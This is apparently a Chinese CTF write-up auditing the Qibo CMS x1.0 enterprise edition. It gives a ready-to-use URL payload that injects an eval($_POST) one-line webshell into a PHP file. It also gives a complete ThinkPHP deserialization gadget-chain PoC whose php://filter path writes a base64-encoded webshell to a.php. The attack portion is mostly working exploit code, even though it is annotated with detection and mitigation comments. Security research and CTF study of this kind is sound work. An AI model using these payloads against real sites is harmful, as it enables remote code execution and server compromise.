[代码审计]齐博建站系统x1.0企业版代码审计
Posted Y4tacker
写在前面
复现2021 DASCTF July X CBCTF 4th赛题
齐博建站系统x1.0后台存在命令执行漏洞
漏洞点在于 application/admin/controller/Upgrade.php 下的 sysup 函数。
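跟入 writelog,可以看到传入的内容没有经过任何过滤就被直接拼接,而且写入的目标是一个 php 文件。也就是说,用户可控的数据最终落在了会被解析执行的文件里,这是问题的根因;修复时应对写入值做严格的白名单校验(例如只允许版本号字符),并避免把外部输入写入 .php 文件。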
因此我们直接访问
http://yyds.top/admin.php/admin/upgrade/sysup.html?upgrade_edition=%22,%22%22=%3E-eval($_POST[%27yyds%27])-%22,];?%3E//
即可在 runtime/client_upgrade_edition.php 中生成一句话木马。排查时可以检查 runtime 目录下该文件的内容,以及访问日志中 upgrade_edition 参数是否带有 PHP 代码片段。
齐博建站系统x1.0企业版前台反序列化漏洞
漏洞点在 application/index/controller/Labelmodels.php 下的 get_label 方法。
传一个数组进去即可触发。网上已有针对这个版本的 poc(见下),当然肯定还有其他更好用的利用链,懂的都懂。修复方向:不要对用户可控的数据做反序列化,可改用 json_decode,或在调用 unserialize 时通过 allowed_classes 限制可实例化的类。
<?php
namespace think\\process\\pipes {
// Outermost object of the serialized graph: the script at the end of this
// listing serializes an instance of this class, so its class name appears in
// the resulting payload.
// NOTE(review): presumably a minimal redeclaration of the framework class that
// carries only the property needed in the serialized form; confirm against
// the framework source.
// Detection: a request parameter whose serialized data names
// think\process\pipes\Windows is an indicator of this chain.
class Windows {
// Holds the nested object; wrapped in a one-element array by the constructor.
private $files = [];
public function __construct($files)
{
$this->files = [$files]; // $files is a concrete subclass of think\Model (new Pivot() in this listing); Model itself is abstract
}
}
}
namespace think {
// Abstract base declared with three properties that the constructor fills in.
// It cannot be instantiated directly; this listing instantiates the Pivot
// subclass instead.
abstract class Model{
protected $append = [];
protected $error = null;
public $parent;
/**
 * @param mixed $output        stored in $parent (a think\console\Output in this listing)
 * @param mixed $modelRelation stored in $error (a HasOne relation in this listing)
 */
function __construct($output, $modelRelation)
{
$this->parent = $output; // $this->parent => think\console\Output
$this->append = array("xxx"=>"getError"); // author's note: causes getError to be called, which returns $this->error
$this->error = $modelRelation; // author's note: must be a subclass of the relation class and of OneToOne, i.e. HasOne
}
}
}
namespace think\\model{
use think\\Model;
// Concrete subclass of the abstract Model; adds no state of its own.
class Pivot extends Model{
/**
 * Forwards both arguments unchanged to the Model constructor.
 */
function __construct($output, $modelRelation)
{
parent::__construct($output, $modelRelation);
}
}
}
namespace think\\model\\relation{
// Empty concrete subclass of the abstract OneToOne declared later in this
// listing; it inherits OneToOne's constructor and properties.
class HasOne extends OneToOne {
}
}
namespace think\\model\\relation {
// Abstract relation base holding three properties set by the constructor.
abstract class OneToOne
{
protected $selfRelation;
protected $bindAttr = [];
protected $query;
/**
 * @param mixed $query stored in $query (a think\db\Query in this listing)
 */
function __construct($query)
{
$this->selfRelation = 0;
$this->query = $query; // $query points to the Query object
$this->bindAttr = ['xxx'];// author's note: this value is used as the second argument of the call function (presumably __call; confirm against the framework)
}
}
}
namespace think\\db {
// Wrapper with a single property; only stores the object passed in.
class Query {
protected $model;
/**
 * @param mixed $model stored in $model (a think\console\Output in this listing)
 */
function __construct($model)
{
$this->model = $model; // $this->model => think\console\Output
}
}
}
namespace think\\console{
// Holds a handle object and a list of style names.
class Output{
private $handle;
protected $styles;
/**
 * @param mixed $handle stored in $handle (a think\session\driver\Memcached in this listing)
 */
function __construct($handle)
{
// NOTE(review): 'getAttr' is presumably the method name this object must
// accept as a "style" for the chain to continue; confirm against the framework.
$this->styles = ['getAttr'];
$this->handle =$handle; // $handle => think\session\driver\Memcached
}
}
}
namespace think\\session\\driver {
// Session driver stand-in with a single property for the wrapped handler.
class Memcached
{
protected $handler;
/**
 * @param mixed $handle stored in $handler (a think\cache\driver\File in this listing)
 */
function __construct($handle)
{
$this->handler = $handle; // $handle => think\cache\driver\File
}
}
}
namespace think\\cache\\driver {
// Innermost object of the graph: a file cache driver whose options are fixed
// by the constructor rather than passed in.
class File
{
protected $options=null;
protected $tag;
function __construct(){
$this->options=[
'expire' => 3600,
'cache_subdir' => false,
'prefix' => '',
// The cache path is a php://filter stream-wrapper URL (iconv utf-8 to utf-7,
// then base64-decode) whose resource name ends in /../a.php.
// NOTE(review): the base64-looking segment in the resource name is presumably
// the content intended for that .php file; decode it only in an isolated
// environment to confirm.
// Detection: a cache 'path' option starting with php://filter inside
// serialized input is a strong indicator of this technique.
'path' => 'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g/../a.php',
'data_compress' => false,
];
$this->tag = 'xxx';
}
}
}
namespace {
// Builds the nested object graph from the inside out
// (File -> Memcached -> Output -> Query -> HasOne -> Pivot -> Windows)
// and prints its serialized form, URL-encoded.
// Mitigation: the application side must not pass request data to
// unserialize(); where deserialization cannot be removed, restrict it with
// the allowed_classes option so none of these classes can be instantiated.
$Memcached = new think\\session\\driver\\Memcached(new \\think\\cache\\driver\\File());
$Output = new think\\console\\Output($Memcached);
$model = new think\\db\\Query($Output);
$HasOne = new think\\model\\relation\\HasOne($model);
// The same $Output instance is referenced both by Query and by Pivot.
$window = new think\\process\\pipes\\Windows(new think\\model\\Pivot($Output,$HasOne));
echo urlencode(serialize($window));
}